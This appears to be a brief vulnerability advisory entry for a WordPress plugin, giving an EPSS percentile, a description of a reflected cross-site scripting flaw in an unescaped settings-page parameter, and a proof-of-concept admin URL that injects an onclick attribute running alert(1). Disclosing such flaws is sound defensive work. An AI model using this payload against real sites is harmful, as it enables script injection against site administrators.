EPSS
Percentile
40.2%
The plugin doesn’t escape a parameter on its setting page, making it possible for attackers to conduct reflected cross-site scripting attacks.
https://example.com/wp-admin/admin.php?page=wpo_wcpdf_options_page&preview;=xxxxx"+accesskey%3DX+onclick%3Dalert(1)+test%3D"